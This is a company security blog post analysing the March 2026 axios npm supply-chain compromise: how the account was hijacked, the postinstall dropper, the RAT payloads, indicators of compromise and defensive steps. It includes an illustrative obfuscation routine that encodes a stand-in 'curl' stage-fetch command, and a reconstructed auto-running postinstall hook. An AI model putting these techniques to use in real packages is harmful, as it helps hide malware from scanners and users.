Security
Mar 31, 2026

The Axios Compromise: What Happened, What It Means, and What You Should Do Right Now

A Compromised Maintainer Account, a Three-Hour Window, and 100 Million Weekly Downloads — Here's the Full Breakdown

On March 31, 2026, two malicious versions of axios — the JavaScript HTTP client with over 100 million weekly npm downloads — were published to the npm registry through a compromised maintainer account. For roughly three hours, anyone whose build system pulled a fresh install got more than they bargained for: a cross-platform remote access trojan capable of full system compromise.

The malicious versions (1.14.1 and 0.30.4) have been removed. But if your CI pipeline, dev machine, or build server ran npm install between 00:21 and 03:29 UTC on March 31, the damage may already be done.

Here's what happened, why it matters, and what your team should be doing about it today.

What Happened

This wasn't a typosquat. It wasn't a rogue dependency quietly slipping into a build. The attacker compromised the npm account of @jasonsaayman, the lead axios maintainer, and changed the account's registered email to an attacker-controlled ProtonMail address (ifstap@proton.me) — locking the legitimate owner out of account recovery. With full control of the account, the attacker published the malicious versions directly via the npm CLI, completely bypassing the project's normal GitHub Actions CI/CD pipeline, branch protections, and code review gates. The malicious versions have no corresponding git tags, commits, or release branches in the axios repository — they exist only on npm.

Rather than modifying any axios source code directly (which would be easier to spot in a diff), the attacker added a single new dependency to package.json: plain-crypto-js@4.2.1. That package had been purpose-built for this attack. A clean version (4.2.0) was published 18 hours earlier under a separate throwaway account, presumably to give it a brief, innocent-looking history on the registry.

When npm resolved the dependency tree and installed plain-crypto-js, it automatically ran a postinstall hook — node setup.js — and that was the entire entry point for the compromise.
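The trigger needs nothing more than a scripts entry in the malicious package's own manifest. A hypothetical reconstruction to illustrate the mechanism (field values are illustrative, not recovered from the actual package):

```json
{
  "name": "plain-crypto-js",
  "version": "4.2.1",
  "scripts": {
    "postinstall": "node setup.js"
  }
}
```

npm executes postinstall automatically after the package is unpacked during install — no require or import of the package is ever needed for the code to run.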

How the Payload Worked

The setup.js dropper used two layers of obfuscation: reversed Base64 encoding with modified padding characters, plus an XOR cipher. Once decoded, the script fingerprinted the host OS and pulled a platform-specific second-stage payload from a command-and-control server at sfrclak[.]com:8000.
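To make the scheme concrete, here's a small illustrative sketch of a reversed-Base64-plus-XOR decode in Node. Everything in it is hypothetical — the string, the XOR key, and the omission of the padding-character substitution are for explanation only, not recovered from the actual dropper:

```javascript
// Illustrative sketch of a two-layer decode (reversed Base64 + single-byte
// XOR). Hypothetical reconstruction for explanation only -- not the actual
// payload, and it skips the dropper's modified-padding trick.

// Encode: XOR each byte, Base64-encode, then reverse the string.
function obfuscate(text, key) {
  const xored = Buffer.from([...Buffer.from(text)].map((b) => b ^ key));
  return xored.toString("base64").split("").reverse().join("");
}

// Decode: reverse the string, Base64-decode, XOR back.
function deobfuscate(blob, key) {
  const b64 = blob.split("").reverse().join("");
  const xored = Buffer.from(b64, "base64");
  return Buffer.from([...xored].map((b) => b ^ key)).toString();
}

const blob = obfuscate("curl http://c2.example/stage2", 0x2a);
console.log(deobfuscate(blob, 0x2a));
```

The point is how cheap this is: two trivial transforms are enough to defeat naive string-matching scanners looking for suspicious URLs or shell commands in package source.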

The payloads were tailored per platform:

  • macOS: A binary disguised as an Apple system daemon (com.apple.act.mond) that beaconed to the C2 every 60 seconds and accepted commands for arbitrary code execution, filesystem enumeration, and ad-hoc code signing to bypass Gatekeeper.
  • Windows: A VBScript downloader that copied PowerShell to %PROGRAMDATA%\wt.exe (masquerading as Windows Terminal) and launched a hidden RAT with execution policy bypass.
  • Linux: A Python RAT dropped to /tmp/ld.py and launched as an orphaned background process via nohup.

After execution, the malware cleaned up after itself — deleting setup.js, swapping the package.json for a sanitized version, and leaving node_modules/plain-crypto-js looking completely benign. If you inspected the directory after the fact, you'd find no trace of the postinstall hook.

This is not script-kiddie-level work. The attacker pre-staged infrastructure, used double obfuscation, built three platform-specific RATs, and implemented anti-forensic self-deletion. This was deliberate, planned, and operationally sophisticated.

Who's at Risk

The three-hour publication window is the critical constraint. You're most likely affected if:

  • Your CI/CD pipelines don't pin dependency versions and ran npm install (or bun install) on a schedule or on commit during that UTC window — especially pipelines that run overnight or in early morning hours.
  • You (or anyone on your team) ran npm install or npm update locally during that window and happened to pull 1.14.1 or 0.30.4.
  • Your project depends on @qqbrowser/openclaw-qbot or @shadanai/openclaw, which bundled the malicious dependency independently of the axios timeline.

If your lockfile was committed before the malicious versions were published and your install didn't update it, you're in the clear. The lockfile is what saved most people here.

How to Check Your Exposure

Check your lockfile:

# npm (lockfile v2/v3: the version sits on a line after the package key)
grep -A 2 '"node_modules/axios"' package-lock.json | grep -E '"version": "(1\.14\.1|0\.30\.4)"'

# yarn (the version line follows the axios@ entry)
grep -A 1 '^axios@' yarn.lock | grep -E 'version "(1\.14\.1|0\.30\.4)"'

# bun (text lockfile, Bun 1.2+)
grep -E 'axios@(1\.14\.1|0\.30\.4)' bun.lock

Check for the malicious transitive dependency:

npm ls plain-crypto-js
# or
find node_modules -name "plain-crypto-js" -type d

Check for indicators of compromise on machines that may have been exposed:

Indicators by Platform

  • macOS: /Library/Caches/com.apple.act.mond binary
  • Windows: %PROGRAMDATA%\wt.exe (PowerShell masquerading as Windows Terminal)
  • Linux: /tmp/ld.py Python script
  • Network: outbound connections to sfrclak[.]com / 142.11.206.73:8000

If You're Affected: Assume Breach

This isn't a "patch and move on" situation. If any of your systems installed the compromised versions, the RAT was live, beaconing, and capable of executing arbitrary follow-on payloads. Treat it accordingly:

  1. Isolate immediately. Quarantine any system that ran npm install during the affected window.
  2. Rotate everything. Every credential on the affected machine — API keys, SSH keys, cloud credentials, npm tokens, GitHub tokens — should be revoked and reissued. Not rotated in place. Revoked.
  3. Look for lateral movement. Check logs for outbound connections to the C2 infrastructure. If the RAT had time to execute, assume the attacker had arbitrary code execution and may have moved laterally.
  4. Rebuild, don't clean. Do not attempt to remediate compromised systems. Rebuild from a known-clean snapshot or base image.
  5. Audit your CI/CD logs. Review build logs for the March 31 UTC window to identify every pipeline that may have pulled the affected versions.

If You're Not Affected: Harden Anyway

This is a good day to tighten your supply chain hygiene. None of these are new recommendations, but this incident is a useful reminder of why they matter.

Enforce lockfiles in CI. Use npm ci instead of npm install in your pipelines. npm ci installs exactly what's in the lockfile and fails if it doesn't match package.json. This single practice would have prevented this attack for any project with a committed lockfile.

Disable postinstall scripts where you can. Running npm ci --ignore-scripts in CI environments prevents lifecycle hooks from executing entirely. This would have stopped the dropper cold. The tradeoff is that packages requiring native compilation or other legitimate post-install steps will break, so evaluate this on a per-project basis.
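Combined, these two recommendations fit in a single CI step. A minimal sketch in GitHub Actions syntax (workflow scaffolding omitted; adapt to your CI system, and remember that --ignore-scripts breaks packages with legitimate install-time steps):

```yaml
# Hardened install step: lockfile-exact, no lifecycle scripts.
- name: Install dependencies
  run: npm ci --ignore-scripts
```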

Pin your dependencies. If your package.json uses caret ranges (^1.14.0), npm will happily resolve to 1.14.1 on the next install. Pinning to exact versions (1.14.0) or relying on a committed lockfile prevents silent upgrades.
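If you want npm to record exact versions by default instead of caret ranges, a one-line .npmrc setting does it — a standard npm config option, shown here per-project:

```ini
# .npmrc -- record exact versions on `npm install <pkg>` instead of ^-ranges
save-exact=true
```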

Monitor for unexpected network activity from build environments. Build servers shouldn't be making outbound connections to unknown hosts. If yours are, you'll want to know about it — ideally before a three-hour window turns into a three-month dwell time.

Treat maintainer accounts as critical infrastructure. The root cause here was a compromised npm account. If your organization publishes packages, enforce 2FA, use publish-specific tokens with limited scope, and audit who has publishing rights regularly. If you're a consumer, know that the packages you depend on are only as secure as their maintainers' credentials.

The Bigger Picture

This attack follows a pattern that's becoming distressingly familiar. The eslint-config-prettier compromise. The Shai-Hulud campaign that hit hundreds of packages. The recent LiteLLM compromise on PyPI. The playbook is consistent: gain access to a trusted account, publish a malicious version, and let the ecosystem's implicit trust do the rest.

What makes the axios incident stand out is the combination of scale and sophistication. Over 100 million weekly downloads means even a three-hour window represents an enormous blast radius. And the attacker didn't cut corners — pre-staged infrastructure, double obfuscation, platform-specific RATs, anti-forensic cleanup. This was a professional operation.

The uncomfortable truth is that the npm ecosystem (and package registries in general) still relies heavily on trust. Trust that maintainers' accounts are secure. Trust that dependencies haven't been tampered with. Trust that postinstall scripts do what they say. Every control we layer on top — lockfiles, SBOMs, dependency scanning, script auditing — is an attempt to verify that trust before it's too late.

No single tool or practice prevents every supply chain attack. But the organizations that fare best are the ones that stack defenses: lockfile enforcement, dependency scanning, runtime monitoring, restricted network egress from build systems, and a clear incident response plan for when (not if) something gets through.

One More Thing

At HeroDevs, we spend our days thinking about what happens when the software you depend on can no longer protect itself — and incidents like this reinforce why that work matters. If you're evaluating your supply chain posture or dealing with end-of-life dependencies that compound these risks, we're here to help.

Stay safe out there. Commit your lockfiles. And maybe go check your CI logs from last night.

Author
Allison Vorthmann
Engineering Manager